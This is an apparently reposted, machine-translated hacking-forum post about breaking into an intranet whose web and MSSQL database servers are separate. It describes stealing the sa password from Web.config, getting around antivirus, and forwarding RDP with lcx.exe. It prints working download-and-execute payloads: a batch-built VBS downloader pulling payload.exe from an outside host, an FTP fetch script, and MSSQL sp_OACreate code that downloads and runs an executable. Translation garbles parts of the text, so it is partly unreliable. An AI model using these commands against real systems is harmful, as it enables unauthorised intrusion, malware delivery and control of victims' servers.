This article transferred from: http://bbs.blackbap.org/thread-6203-1-2.html
1. Server is intranet environment, station library separation, through Web. config to find the database service library sa account password, successfully added users (192.168.0.206).
2. The Web server (192.168.0.203), the database server (192.168.0.206) are present in Symantec antivirus software and cannot be forwarded lcx.exe tools.
3. Testing other forwarding tools, either Avira, or unusable, using the Reduh tool can only forward the current IP, and the speed is very slow, can't stand 0.0.
4. Using Msfpayload generated EXE file is also Avira, because the server is x64, Msfencode no x64 encoder, so failed to rebound successfully.
Idea 1: Turn off kill soft, download the file by following the commands provided below (not tested)
Idea 2: Use MSF aspx bounce, then forward and cross-route penetration (succeeded)
Normal thinking: If not kill soft, direct lcx.exe to 192.168.0.203, and then use the following command to forward 192.168.0.206:
C:\lcx.exe-slave your extranet IP 51 192.168.0.206 3389//After seeing this, you should all know it 0.0.
DOS command: (one line execution)
- echo Set Post = CreateObject ("Msxml2.xmlhttp") >>xxx.vbs
- echo Set Shell = CreateObject ("Wscript.Shell") >>xxx.vbs
- echo Post.open "GET", "Http://bbs.blackbap.org/payload.exe", 0 >>xxx.vbs
- Echo post.send () >>xxx.vbs
- echo Set Aget = CreateObject ("ADODB. Stream ") >>xxxc.vbs
- echo Aget.mode = 3 >>xxx.vbs
- echo Aget.type = 1 >>xxx.vbs
- Echo Aget.open () >>xxx.vbs
- echo aget.write (post.responsebody) >>xxx.vbs
- echo Aget.savetofile "C:\xxxc.exe", 2 >>xxx.vbs
- Echo Wscript.Sleep >>xxxc.vbs
- Echo Shell.run ("C:\xxx.exe") >>xxx.vbs
Copy Code
- Echo Open 127.0.0.1>c:\ftp.dat
- Echo Admin>>c:\ftp.dat
- Echo Admin>>c:\ftp.dat
- Echo Binary>>c:\ftp.dat
- Echo Get Lcx.exe>>c:\ftp.dat
- Echo Bye>>c:\ftp.dat
- Ftp-s:c:\ftp.dat
Copy Code
MSSQL command:
- DECLARE @js int
- EXEC sp_OACreate ' ScriptControl ', @js out
- EXEC sp_OASetProperty @js, ' Language ', ' JavaScript1.1 '
- EXEC sp_OAMethod @js, ' Eval ', NULL, ' var x = new ActiveXObject ("Microsoft.XMLHTTP"); X.open ("GET", "Url", 0); X.send (); var s = new ActiveXObject ("ADODB. Stream "); S.mode = 3;s.type = 1;s.open (); S.write (x.responsebody); S.savetofile (" c:\\windows\\ set the saved EXE file name to EXE ", 2); var r = new ActiveXObject ("Wscript.Shell"); R.run ("c:\\windows\\ set the saved EXE file name. exe"); '
Copy Code
- declare @o int, @f int, @t int, @ret int
- exec sp_oacreate ' Scripting.FileSystemObject ', @o out
- exec sp_OAMethod @o, ' CreateTextFile ', @f out, ' C:\1.bat ', 1
- exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' open IP '
- exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' FTP account '
- exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' ftp password '
- exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Get Lcx.exe '
- exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Bye '
Infiltration thinking of the separation of the MSSQL Station library